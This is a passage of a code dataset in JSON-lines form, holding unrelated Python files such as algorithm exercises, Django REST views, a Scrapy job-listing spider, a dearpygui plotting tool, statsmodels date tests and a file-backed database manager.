plus, minus, multi-1, division)\n if division:\n dfs(i + 1, int(res/nums[i]), plus, minus, multi, division-1)\n\n\n\nn = int(input())\nnums = list(map(int, input().split()))\ncarl = list(map(int, input().split()))\nmax_num = -float('inf')\nmin_num = float('inf')\ndfs(1,nums[0],carl[0],carl[1],carl[2],carl[3])\nprint(max_num)\nprint(min_num)","repo_name":"kimsh8337/daliy-coding","sub_path":"연습/20.05/200519/BK_14888_연산자 끼워넣기.py","file_name":"BK_14888_연산자 끼워넣기.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24580468128","text":"\"\"\" Write a automata code for L(M)= a + aa*b + a*b. 3. Write a automata code for Let Σ = {0,1}.\"\"\"\nfrom automata.fa.nfa import NFA\n# NFA which accepts strings that ends with 'ab'\nnfa = NFA(\n states={'q0', 'q1', 'q2', 'q3', 'q4'},\n input_symbols={'a', 'b'},\n transitions={\n 'q0': {'a': {'q1','q2'}},\n 'q1': {'a': {'q2','q4'}, 'b': {'q4'}},\n 'q2': {'a': {'q2'}, 'b': {'q3'}},\n 'q3': {},\n 'q4': {}\n },\n initial_state='q0',\n final_states={'q1','q3'}\n)\nfor i in range(1,6):\n num = input(\"Enter the string :\")\n if(nfa.accepts_input(num)):\n print(\"Accepted\")\n else:\n print(\"Rejected\")\n","repo_name":"puneeetsharma/CollageLab","sub_path":"APP Lab Sem 4/AUTOMATA PROGRAMMING/NFA/Q2-code.py","file_name":"Q2-code.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25671464948","text":"from unique_name_checker import uniqueFullNameChecker\n\ndef countUniqueNames(billFirstName, billLastName, shipFirstName, shipLastName, billNameOnCard):\n \"\"\"counts the number of unique names in a transaction\"\"\"\n counter = 3\n billFirstName.lower()\n billLastName.lower()\n shipFirstName.lower()\n shipLastName.lower()\n billNameOnCard.lower()\n FnameOnCard= '' \n MnameOnCard = '' \n LnameOnCard = ''\n\n \n \n #checks for a full name inside the bill name on card\n if len(billNameOnCard.split(' ')) == 3:\n [FnameOnCard, MnameOnCard, LnameOnCard] = billNameOnCard.split(' ')\n if uniqueFullNameChecker(FnameOnCard + \" \" + MnameOnCard, LnameOnCard, billFirstName, billLastName):\n counter-=1\n else:\n if uniqueFullNameChecker(MnameOnCard + \" \" + LnameOnCard, FnameOnCard, billFirstName, billLastName):\n counter-=1\n if uniqueFullNameChecker(FnameOnCard + \" \" + MnameOnCard, LnameOnCard, shipFirstName, shipLastName):\n counter-=1\n 
else:\n if uniqueFullNameChecker(MnameOnCard + \" \" + LnameOnCard, FnameOnCard, shipFirstName, shipLastName):\n counter-=1\n \n #checks for name without middle name inside the bill name on card\n if len(billNameOnCard.split(' ')) == 2:\n [FnameOnCard, LnameOnCard] = billNameOnCard.split(' ')\n if uniqueFullNameChecker(FnameOnCard,LnameOnCard, billFirstName, billLastName):\n counter -= 1\n else:\n if uniqueFullNameChecker(LnameOnCard,FnameOnCard, billFirstName, billLastName):\n counter -= 1 \n if uniqueFullNameChecker(FnameOnCard, LnameOnCard, shipFirstName, shipLastName):\n counter -= 1\n else:\n if uniqueFullNameChecker(LnameOnCard, FnameOnCard, shipFirstName, shipLastName):\n counter -= 1\n \n if uniqueFullNameChecker(billFirstName, billLastName, shipFirstName, shipLastName):\n counter-=1\n \n if counter == 3:\n return 3\n if counter == 2:\n return 2\n if counter == 1:\n return 2\n if counter == 0:\n return 1\n \n\n \n\n\n\n","repo_name":"Imrin1/Unique-names-counter","sub_path":"Unique_name_counter.py","file_name":"Unique_name_counter.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24386069968","text":"from django.http import *\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.parsers import JSONParser\n\nfrom api.models import Story\nfrom api.serializers import StorySerializer\n\n\n@csrf_exempt\ndef snippet_list(request):\n \"\"\"\n List all code snippets, or create a new snippet.\n \"\"\"\n if request.method == 'GET':\n snippets = Story.objects.all()\n serializer = StorySerializer(snippets, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n elif request.method == 'POST':\n data = JSONParser().parse(request)\n serializer = StorySerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n\n@csrf_exempt\ndef snippet_detail(request, title):\n \"\"\"\n Retrieve, update or delete a code snippet.\n \"\"\"\n try:\n snippet = Story.objects.get(title=title)\n except Story.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = StorySerializer(snippet)\n return JsonResponse(serializer.data)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = StorySerializer(snippet, data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data)\n return JsonResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n snippet.delete()\n return HttpResponse(status=204)\n\n@csrf_exempt\ndef entry(request): \n html = \"

Hello Masses

\" \n return HttpResponse(html)\n\n","repo_name":"KavinJey/storytelling-api","sub_path":"stories/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72355122082","text":"import ROOT, os, SetBranch\nfrom ROOT import TChain, TFile\n\n#### Function that takes as inputs: min and max which are 2 integers that indicates from which subjob to which subjob the TChain ranges; cuts are the cuts applied to the TTrees; directory is the directory in which the subjobs are to be found and saving_directory is the directory in which the stripped files are then saved. ####\n\ndef strip_n_save (min, max, cuts, directory, saving_directory, extra_variables, particle = \"Lc\", bins = False, tree = None):\n \n if not (bins):\n filename = \"{0}2pKpiTuple.root\".format(particle)\n alldata = TChain(\"tuple_{0}2pKpi/DecayTree\".format(particle))\n extra_dir = \"\"\n for job in range(min, max) :\n alldata.Add(\"{0}/{1}{2}/{3}\".format(directory,job,extra_dir,filename))\n \n #Check if there are any issues with the data\n if (alldata.GetEntries() == 0):\n print(\"Error: entries = 0 for range \" + str(min) + \"-\" + str(max))\n return\n if (alldata.GetEntries() == -1):\n print(\"Error: entries = -1 for range \" + str(min) + \"-\" + str(max))\n return\n\n alldata = SetBranch.setBranch_funct(alldata, extra_variables)\n extra_string = \"_cluster_{0}-{1}.root\".format(min, max)\n else:\n if not (tree == None):\n alldata = tree\n extra_string = \"\"\n \n wfile = TFile.Open(saving_directory + extra_string, \"RECREATE\")\n subtree = alldata.CopyTree( cuts )\n wfile.cd()\n subtree.Write()\n wfile.Close()\n","repo_name":"jackfrost373/LHCb_Xic_production","sub_path":"analysis/Scripts/Archive/TuplesPrep_Archive/Strip.py","file_name":"Strip.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"16812829514","text":"import time\nimport json\nimport _thread\nimport socket\n\nfrom core.mks import mks_config\nfrom core import co_queue\nfrom core import co_security\nfrom core import co_logger\n\nclass StaticRoutes():\n\tdef __init__(self, network, config):\n\t\tself.Config\t\t\t\t= config\n\t\tself.Users \t\t\t\t= {}\n\t\tself.Network \t\t\t= network\n\t\tself.Running \t\t\t= True\n\t\tself.UserEventsCallback\t= None\n\t\tself.Routes \t\t\t= None\n\t\n\tdef EmitEvent(self, event, info):\n\t\tif self.UserEventsCallback is not None:\n\t\t\tself.UserEventsCallback(event, info)\n\t\n\tdef CheckRoutes(self):\n\t\tif self.Routes is None:\n\t\t\treturn\n\t\t\n\t\tfor route in self.Routes:\n\t\t\tip = route[\"ip\"]\n\t\t\tport = route[\"port\"]\n\n\t\t\tinfo = self.Network.GetSocketInfoByIpPort(ip, port)\n\t\t\tif info is None:\n\t\t\t\t# Requested route is not connected\n\t\t\t\thash_key = self.Network.Connect(ip, port, None)\n\t\t\t\tif hash_key is None:\n\t\t\t\t\tif \"availabale\" in route:\n\t\t\t\t\t\tif route[\"availabale\"] is True:\n\t\t\t\t\t\t\t# Emit event route unavailable\n\t\t\t\t\t\t\tself.EmitEvent(\"disconnected\", route)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\t\t\troute[\"availabale\"] = False\n\t\t\t\t\troute[\"hash_key\"] = \"\"\n\t\t\t\telse:\n\t\t\t\t\t#if \"availabale\" in route:\n\t\t\t\t\t#\tif route[\"availabale\"] is False:\n\t\t\t\t\t#\t\t# Emit event route available\n\t\t\t\t\t#\t\tself.EmitEvent(\"connected\", route)\n\t\t\t\t\t#else:\n\t\t\t\t\t#\t# Emit event route 
available\n\t\t\t\t\t#\tself.EmitEvent(\"connected\", route)\n\n\t\t\t\t\troute[\"availabale\"] = True\n\t\t\t\t\troute[\"hash_key\"] = hash_key\n\t\t\t\t\tself.Network.Disconnect(ip, port)\n\t\t\t\t\tself.EmitEvent(\"connected\", route)\n\t\t\telse:\n\t\t\t\tif \"availabale\" in route:\n\t\t\t\t\t# Check info name\n\t\t\t\t\t# co_logger.LOGGER.Log(\"(StaticRoutes)# [CheckRoutes] Check info name {}:{}\".format(ip, port), 1)\n\t\t\t\t\tself.EmitEvent(\"exist\", route)\n\t\t\t\telse:\n\t\t\t\t\tco_logger.LOGGER.Log(\"(StaticRoutes)# [CheckRoutes] Connection taken {}:{}\".format(ip, port), 1)\n\t\n\tdef Run(self):\n\t\t_thread.start_new_thread(self.Worker, ())\n\n\tdef Stop(self):\n\t\tself.Running = False\n\n\tdef Worker(self):\n\t\tco_logger.LOGGER.Log(\"(StaticRoutes)# Start worker\", 1)\n\n\t\tif self.Config is None:\n\t\t\treturn False\n\t\t\n\t\tself.Routes = self.Config.Application[\"server\"][\"static\"][\"users\"]\n\t\tself.Running = True\n\t\ttime.sleep(0.5)\n\t\twhile self.Running is True:\n\t\t\tself.CheckRoutes()\n\t\t\ttime.sleep(5)","repo_name":"openmks/core-py","sub_path":"co_static_routes.py","file_name":"co_static_routes.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23214838649","text":"from data_structures_and_algorithms.challenges.queue_with_stacks.queue_with_stacks import Stack,Pseudo_queue,Node\nimport pytest\n\ndef test_Happy_Path_enqueue():\n ch11 = Pseudo_queue()\n ch11.enqueue(20)\n ch11.enqueue(15)\n ch11.enqueue(10)\n ch11.enqueue(5)\n actual=ch11.input.__str__()\n expected='-> <5>-> <10>-> <15>-> <20>'\n assert actual == expected\n # assert \"hi\"==\"hi\"\n\ndef test_Happy_Path_dequeue():\n ch11 = Pseudo_queue()\n ch11.enqueue(20)\n ch11.enqueue(15)\n ch11.enqueue(10)\n ch11.enqueue(5)\n assert ch11.dequeue()==20\n\ndef test_failure1():\n ch11 = Pseudo_queue()\n \n assert ch11.dequeue()==None\n\ndef test_failure2():\n ch11 = Pseudo_queue()\n assert ch11.dequeue()==None\n\ndef test_Edge_Case():\n ch11 = Pseudo_queue()\n ch11.enqueue(\"\")\n assert ch11.dequeue().__str__()==\"\"\n\ndef test_Edge_Case2():\n ch11 = Pseudo_queue()\n ch11.enqueue(None)\n assert ch11.dequeue()==None\n","repo_name":"maisjamil1/data-structures-and-algorithms","sub_path":"data-structures-and-algorithms/tests/challenges/test_queue_with_stacks.py","file_name":"test_queue_with_stacks.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72407300320","text":"# -*- coding: utf-8 -*-\n\nfrom behave import step, given, when, then\nfrom page_object_definitions.home import HomePage\n\n\n@step('I navigate to \"{resource}\"')\ndef navigate_url(context, resource):\n context.driver.get(context.data['Pages'][resource]['url'])\n context.driver.maximize_window()\n exec ('context.page = {}(context)'.format(resource))\n context.page.init_page_elements(context)\n\n","repo_name":"jmrn77/RyanAir","sub_path":"Test/common/steps/custom_steps.py","file_name":"custom_steps.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72539796962","text":"import dearpygui.dearpygui as dpg\nimport plot\n\n\nclass CSV_to_Plot_GUI():\n def __init__(self, plot_handler: plot.Plot_Visualizer) -> None:\n self.plot_handler = plot_handler\n self.last_plot_name = \"\"\n dpg.create_context()\n dpg.create_viewport(title='csv to 
plot converter')\n\n with dpg.window(label=\"CSV to image plot converter\", height=400, width=400):\n with dpg.menu_bar():\n with dpg.menu(label=\"File\"):\n dpg.add_menu_item(label=\"Open csv file\",\n callback=lambda: dpg.show_item(\"csv_file_dialog\"))\n # File manager read\n with dpg.file_dialog(directory_selector=False, show=False, callback=self.manage_file, tag=\"csv_file_dialog\", height=400):\n dpg.add_file_extension(\".csv\")\n\n dpg.add_text(\n \"Select a csv file and then press the show button to display the plots\")\n dpg.add_text(\"Selected file: \", tag=\"selected_file_text\")\n dpg.add_text(\"File preview:\", tag=\"selected_file_preview\")\n dpg.add_button(label=\"Show\",\n callback=lambda: self.convert_to_plot())\n\n dpg.add_separator()\n dpg.add_text(\n \"Max Torque value: 0 [Nm]\", tag=\"torque_max_value_field\")\n dpg.add_text(\n \"Max Voltage value: 0 [V]\", tag=\"voltage_max_value_field\")\n dpg.add_text(\n \"Max Current value: 0 [A]\", tag=\"current_max_value_field\")\n dpg.add_text(\"Max Power value: 0 [W]\", tag=\"power_max_value_field\")\n\n # Note for every plot use max 3 y axis (the fourth will be not assigned and with 5 a segmentation fault will occur)\n with dpg.window(label=\"CSV to image plot converter\", tag=\"plot_window_0\", pos=(400, 0), show=False, width=400, height=400):\n\n with dpg.plot(label=\"Torque-Current-Voltage\", height=400, width=-1):\n dpg.add_plot_legend()\n\n # create x axis\n dpg.add_plot_axis(dpg.mvXAxis, label=\"Time\")\n\n # create y axis 1: Torque\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Torque [Nm]\")\n dpg.add_line_series((), (), label=\"Torque\",\n parent=dpg.last_item(), tag=\"data_torque_0\")\n\n # # create y axis 2: Current\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Current [A]\")\n dpg.add_line_series((), (), label=\"Current\",\n parent=dpg.last_item(), tag=\"data_current\")\n\n # # create y axis 3: Voltage\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Voltage [V]\")\n dpg.add_line_series((), (), label=\"Voltage\",\n parent=dpg.last_item(), tag=\"data_voltage\")\n\n # Note for every plot use max 3 y axis (the fourth will be not assigned and with 5 a segmentation fault will occur)\n with dpg.window(label=\"CSV to image plot converter\", tag=\"plot_window_1\", pos=(400, 0), show=False, width=400, height=400):\n\n with dpg.plot(label=\"Torque-Power-Brake\", height=400, width=-1):\n dpg.add_plot_legend()\n\n # create x axis\n dpg.add_plot_axis(dpg.mvXAxis, label=\"Time\")\n\n # create y axis 1: Torque\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Torque [Nm]\")\n dpg.add_line_series((), (), label=\"Torque\",\n parent=dpg.last_item(), tag=\"data_torque_1\")\n\n # create y axis 4: Brake\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Brake [%]\")\n dpg.add_line_series((), (), label=\"Brake\",\n parent=dpg.last_item(), tag=\"data_brake\")\n\n # create y axis 5: Power\n dpg.add_plot_axis(dpg.mvYAxis, label=\"Power [W]\")\n dpg.add_line_series((), (), label=\"Power\",\n parent=dpg.last_item(), tag=\"data_power\")\n\n dpg.setup_dearpygui()\n dpg.show_viewport()\n dpg.start_dearpygui()\n dpg.destroy_context()\n\n def manage_file(self, sender, app_data, user_data):\n \"\"\"\n Callback executed when a csv file is read\n \"\"\"\n self.last_plot_name = {app_data['file_name']}\n self.plot_handler.read_csv_vals(app_data['file_path_name'])\n dpg.set_value(\"selected_file_text\",\n f\"Selected file: : {self.last_plot_name}\")\n dpg.set_value(\"selected_file_preview\",\n f\"File 
preview:\\n{self.plot_handler.get_csv_head()}\\n...\\n{self.plot_handler.get_csv_tail()}\")\n dpg.set_value(\"torque_max_value_field\",\n f\"Max Torque value: {self.plot_handler.get_torque_max()} [Nm]\")\n dpg.set_value(\"voltage_max_value_field\",\n f\"Max Voltage value: {self.plot_handler.get_voltage_max()} [V]\")\n dpg.set_value(\"current_max_value_field\",\n f\"Max Current value: {self.plot_handler.get_current_max()} [A]\")\n dpg.set_value(\"power_max_value_field\",\n f\"Max Power value: {self.plot_handler.get_power_max()} [W]\")\n\n def convert_to_plot(self):\n\n dpg.set_value(\"data_torque_0\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_torque_vals()])\n dpg.set_value(\"data_torque_1\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_torque_vals()])\n dpg.set_value(\"data_brake\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_brake_vals()])\n dpg.set_value(\"data_current\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_current_vals()])\n dpg.set_value(\"data_voltage\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_voltage_vals()])\n # print(f\"PWR:{self.plot_handler.get_power_vals()}\")\n dpg.set_value(\"data_voltage\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_voltage_vals()])\n dpg.set_value(\"data_power\", [\n self.plot_handler.get_xvals(), self.plot_handler.get_power_vals()])\n dpg.show_item(\"plot_window_0\")\n dpg.show_item(\"plot_window_1\")\n\n\nif __name__ == \"__main__\":\n try:\n plot_visualizer_instance = plot.Plot_Visualizer()\n csv_to_plot_gui_instance = CSV_to_Plot_GUI(plot_visualizer_instance)\n except Exception as e:\n print(f\"\\nSome errors occured: {e}\\r\\n\")\n","repo_name":"cannox227/Step-Motor-Test-Bench","sub_path":"GUI/src/csv_to_plot_gui.py","file_name":"csv_to_plot_gui.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28090372192","text":"import scrapy\nfrom ..items import JobsItem\nfrom ..named_entity import search_company_name\nfrom ..regex import *\n\n\nclass StackoverflowSpider(scrapy.Spider):\n name = \"stackoverflow_spider\"\n allowed_domains = []\n\n custom_settings = {\n 'CLOSESPIDER_ITEMCOUNT': 1000\n }\n\n start_urls = [\"https://stackoverflow.com/jobs?dr=BackendDeveloper\"]\n\n def parse(self, response):\n \"\"\"\n This function parses stack overflow backend jobs page\n @url https://stackoverflow.com/jobs?dr=BackendDeveloper\n @returns request to extract links\n @scrapes all jobs links\n \"\"\"\n self.logger.info(f\"Scrape Page {response.url}\")\n\n jobs_links = response.xpath(\"//div[@class='grid--cell fl1 ']\"\n \"//h2\"\n \"//a\"\n \"/@href\").getall()\n\n self.logger.info(f\"links especificos {jobs_links}, tamanho {len(jobs_links)}\")\n\n next_page = response.xpath(\"//div[@class='s-pagination']\"\n \"//a[last()]\"\n \"/@href\").get()\n\n self.logger.info(f\"next {next_page}\")\n\n if jobs_links is not None:\n yield from response.follow_all(jobs_links, callback=self.parse_job)\n\n if next_page is not None:\n yield response.follow(next_page, callback=self.parse)\n\n def parse_job(self, second_response):\n \"\"\"\n This function parses stack overflow job pages\n @returns job item\n @scrapes title, company_name, description, hiring_type, hierarchy, salary and mode\n \"\"\"\n item = JobsItem()\n\n item[\"title\"] = second_response.xpath(\n \"//h1[@class='fs-headline1 sticky:fs-body3 sticky:sm:fs-subheading t mb4 sticky:mb2']\"\n \"//a\"\n \"/@title\").get()\n\n 
item[\"company_name\"] = second_response.xpath(\n \"//div[@class='fc-black-700 mb4 sticky:mb0 sticky:mr8 fs-body2 sticky:fs-body1 sticky:sm:fs-caption']\"\n \"//a\"\n \"/text()\").get()\n\n item[\"description\"] = second_response.xpath(\n \"//div[@class='grid gs16 gsx sm:fd-column fs-body2 fc-medium']\"\n \"//div[@class='grid--cell6']\"\n \"//div[3]\"\n \"//span[@class='fw-bold']\"\n \"/text()\").get()\n\n html = get_html_from_response(second_response)\n item[\"hiring_type\"] = search_hiring_type(html)\n item[\"hierarchy\"] = search_hierarchy(html)\n item[\"salary\"] = search_salary(html)\n item[\"mode\"] = search_mode(html)\n item[\"url\"] = second_response.url\n\n self.logger.info(f\"Job scraped\")\n yield item\n","repo_name":"rafaelbcastilhos/webscraping-jobhunter","sub_path":"jobs/jobs/spiders/stackoverflow_spider.py","file_name":"stackoverflow_spider.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5745150065","text":"from datetime import datetime\nfrom pandas import DatetimeIndex\nimport numpy.testing as npt\nfrom statsmodels.tsa.base.datetools import (_date_from_idx,\n _idx_from_dates, date_parser, date_range_str, dates_from_str,\n dates_from_range, _infer_freq, _freq_to_pandas)\nfrom pandas import DatetimeIndex, PeriodIndex\n\ndef test_date_from_idx():\n d1 = datetime(2008, 12, 31)\n idx = 15\n npt.assert_equal(_date_from_idx(d1, idx, 'Q'), datetime(2012, 9, 30))\n npt.assert_equal(_date_from_idx(d1, idx, 'A'), datetime(2023, 12, 31))\n npt.assert_equal(_date_from_idx(d1, idx, 'B'), datetime(2009, 1, 21))\n npt.assert_equal(_date_from_idx(d1, idx, 'D'), datetime(2009, 1, 15))\n npt.assert_equal(_date_from_idx(d1, idx, 'W'), datetime(2009, 4, 12))\n npt.assert_equal(_date_from_idx(d1, idx, 'M'), datetime(2010, 3, 31))\n\ndef test_idx_from_date():\n d1 = datetime(2008, 12, 31)\n idx = 15\n npt.assert_equal(_idx_from_dates(d1, datetime(2012, 9, 30), 'Q'), idx)\n npt.assert_equal(_idx_from_dates(d1, datetime(2023, 12, 31), 'A'), idx)\n npt.assert_equal(_idx_from_dates(d1, datetime(2009, 1, 21), 'B'), idx)\n npt.assert_equal(_idx_from_dates(d1, datetime(2009, 1, 15), 'D'), idx)\n # move d1 and d2 forward to end of week\n npt.assert_equal(_idx_from_dates(datetime(2009, 1, 4),\n datetime(2009, 4, 17), 'W'), idx-1)\n npt.assert_equal(_idx_from_dates(d1, datetime(2010, 3, 31), 'M'), idx)\n\ndef test_regex_matching_month():\n t1 = \"1999m4\"\n t2 = \"1999:m4\"\n t3 = \"1999:mIV\"\n t4 = \"1999mIV\"\n result = datetime(1999, 4, 30)\n npt.assert_equal(date_parser(t1), result)\n npt.assert_equal(date_parser(t2), result)\n npt.assert_equal(date_parser(t3), result)\n npt.assert_equal(date_parser(t4), result)\n\ndef test_regex_matching_quarter():\n t1 = \"1999q4\"\n t2 = \"1999:q4\"\n t3 = \"1999:qIV\"\n t4 = \"1999qIV\"\n result = datetime(1999, 12, 31)\n npt.assert_equal(date_parser(t1), result)\n npt.assert_equal(date_parser(t2), result)\n npt.assert_equal(date_parser(t3), result)\n npt.assert_equal(date_parser(t4), result)\n\ndef test_dates_from_range():\n results = [datetime(1959, 3, 31, 0, 0),\n datetime(1959, 6, 30, 0, 0),\n datetime(1959, 9, 30, 0, 0),\n datetime(1959, 12, 31, 0, 0),\n datetime(1960, 3, 31, 0, 0),\n datetime(1960, 6, 30, 0, 0),\n datetime(1960, 9, 30, 0, 0),\n datetime(1960, 12, 31, 0, 0),\n datetime(1961, 3, 31, 0, 0),\n datetime(1961, 6, 30, 0, 0),\n datetime(1961, 9, 30, 0, 0),\n datetime(1961, 12, 31, 0, 0),\n datetime(1962, 3, 31, 0, 0),\n datetime(1962, 6, 30, 
0, 0)]\n dt_range = dates_from_range('1959q1', '1962q2')\n npt.assert_(results == dt_range)\n\n # test with starting period not the first with length\n results = results[2:]\n dt_range = dates_from_range('1959q3', length=len(results))\n npt.assert_(results == dt_range)\n\n # check month\n results = [datetime(1959, 3, 31, 0, 0),\n datetime(1959, 4, 30, 0, 0),\n datetime(1959, 5, 31, 0, 0),\n datetime(1959, 6, 30, 0, 0),\n datetime(1959, 7, 31, 0, 0),\n datetime(1959, 8, 31, 0, 0),\n datetime(1959, 9, 30, 0, 0),\n datetime(1959, 10, 31, 0, 0),\n datetime(1959, 11, 30, 0, 0),\n datetime(1959, 12, 31, 0, 0),\n datetime(1960, 1, 31, 0, 0),\n datetime(1960, 2, 28, 0, 0),\n datetime(1960, 3, 31, 0, 0),\n datetime(1960, 4, 30, 0, 0),\n datetime(1960, 5, 31, 0, 0),\n datetime(1960, 6, 30, 0, 0),\n datetime(1960, 7, 31, 0, 0),\n datetime(1960, 8, 31, 0, 0),\n datetime(1960, 9, 30, 0, 0),\n datetime(1960, 10, 31, 0, 0),\n datetime(1960, 12, 31, 0, 0),\n datetime(1961, 1, 31, 0, 0),\n datetime(1961, 2, 28, 0, 0),\n datetime(1961, 3, 31, 0, 0),\n datetime(1961, 4, 30, 0, 0),\n datetime(1961, 5, 31, 0, 0),\n datetime(1961, 6, 30, 0, 0),\n datetime(1961, 7, 31, 0, 0),\n datetime(1961, 8, 31, 0, 0),\n datetime(1961, 9, 30, 0, 0),\n datetime(1961, 10, 31, 0, 0)]\n\n dt_range = dates_from_range(\"1959m3\", length=len(results))\n\n\ndef test_infer_freq():\n d1 = datetime(2008, 12, 31)\n d2 = datetime(2012, 9, 30)\n\n b = DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['B']).values\n d = DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['D']).values\n w = DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['W']).values\n m = DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['M']).values\n a = DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['A']).values\n q = DatetimeIndex(start=d1, end=d2, freq=_freq_to_pandas['Q']).values\n\n npt.assert_(_infer_freq(w) == 'W-SUN')\n npt.assert_(_infer_freq(a) == 'A-DEC')\n npt.assert_(_infer_freq(q) == 'Q-DEC')\n npt.assert_(_infer_freq(w[:3]) == 'W-SUN')\n npt.assert_(_infer_freq(a[:3]) == 'A-DEC')\n npt.assert_(_infer_freq(q[:3]) == 'Q-DEC')\n npt.assert_(_infer_freq(b[2:5]) == 'B')\n npt.assert_(_infer_freq(b[:3]) == 'D')\n npt.assert_(_infer_freq(b) == 'B')\n npt.assert_(_infer_freq(d) == 'D')\n npt.assert_(_infer_freq(m) == 'M')\n npt.assert_(_infer_freq(d[:3]) == 'D')\n npt.assert_(_infer_freq(m[:3]) == 'M')\n\ndef test_period_index():\n # tests 1285\n from pandas import PeriodIndex\n dates = PeriodIndex(start=\"1/1/1990\", periods=20, freq=\"M\")\n npt.assert_(_infer_freq(dates) == \"M\")\n","repo_name":"drastorguev/financethroughpython","sub_path":"venv/lib/python2.7/site-packages/statsmodels/tsa/base/tests/test_datetools.py","file_name":"test_datetools.py","file_ext":"py","file_size_in_byte":5781,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"54"} +{"seq_id":"42183454283","text":"import os\n\ntry:\n import ujson as json\nexcept:\n import json\n\nimport yaml\nimport pytoml as toml\n\nfrom panda3d.core import UniqueIdAllocator\nfrom panda3d.direct import DCPacker\nfrom realtime import io, types\nfrom direct.directnotify.DirectNotifyGlobal import directNotify\n\nclass DatabaseError(RuntimeError):\n \"\"\"\n An database specific runtime error\n \"\"\"\n\nclass DatabaseFile(object):\n\n def __init__(self, filename):\n self._filename = filename\n self._data = {}\n\n @property\n def filename(self):\n return self._filename\n\n @filename.setter\n def filename(self, filename):\n self._filename = filename\n\n 
@property\n def data(self):\n return self._data\n\n @data.setter\n def data(self, data):\n self._data = data\n\n def setup(self):\n if not os.path.exists(self._filename):\n self.save()\n\n self.load()\n\n def has_value(self, key):\n return key in self._data\n\n def set_value(self, key, value):\n self._data[key] = value\n self.save()\n\n def get_value(self, key):\n self.load()\n return self._data.get(key)\n\n def set_default_value(self, key, value):\n if self.has_value(key):\n return self.get_value(key)\n\n self.set_value(key, value)\n return value\n\n def close(self):\n self.save()\n\n self._filename = None\n self._data = None\n\n def shutdown(self):\n self.close()\n\nclass DatabaseJSONFile(DatabaseFile):\n\n def save(self):\n with open(self._filename, 'w') as io:\n json.dump(self._data, io, indent=2, sort_keys=True)\n io.close()\n\n def load(self):\n with open(self._filename, 'r') as io:\n self._data = json.load(io)\n io.close()\n\nclass DatabaseYAMLFile(DatabaseFile):\n\n def save(self):\n with open(self._filename, 'w') as io:\n yaml.dump(self._data, io, default_flow_style=False)\n io.close()\n\n def load(self):\n with open(self._filename, 'r') as io:\n self._data = yaml.load(io)\n io.close()\n\nclass DatabaseTOMLFile(DatabaseFile):\n\n def save(self):\n with open(self._filename, 'w') as io:\n toml.dump(self._data, io)\n io.close()\n\n def load(self):\n with open(self._filename, 'r') as io:\n self._data = toml.load(io)\n io.close()\n\nclass DatabaseManager(object):\n\n def __init__(self, file_handler):\n self._files = {}\n self._file_handler = file_handler\n\n self._min_id = config.GetInt('database-min-channels', 1000000000)\n self._max_id = config.GetInt('database-max-channels', 1000001000)\n\n self._directory = config.GetString('database-directory', 'databases/json')\n self._extension = config.GetString('database-extension', '.json')\n\n if not os.path.exists(self._directory):\n os.makedirs(self._directory)\n\n self._tracker = None\n self._tracker_filename = config.GetString('database-tracker', 'next')\n\n self._allocator = None\n\n @property\n def files(self):\n return self._files\n\n @property\n def file_handler(self):\n return self._file_handler\n\n @file_handler.setter\n def file_handler(self, file_handler):\n self._file_handler = file_handler\n\n @property\n def min_id(self):\n return self._min_id\n\n @min_id.setter\n def min_id(self, min_id):\n self._min_id = min_id\n\n @property\n def max_id(self):\n return self._max_id\n\n @max_id.setter\n def max_id(self, max_id):\n self._max_id = max_id\n\n @property\n def directory(self):\n return self._directory\n\n @property\n def extension(self):\n return self._extension\n\n @property\n def tracker(self):\n return self._tracker\n\n @tracker.setter\n def tracker(self, tracker):\n 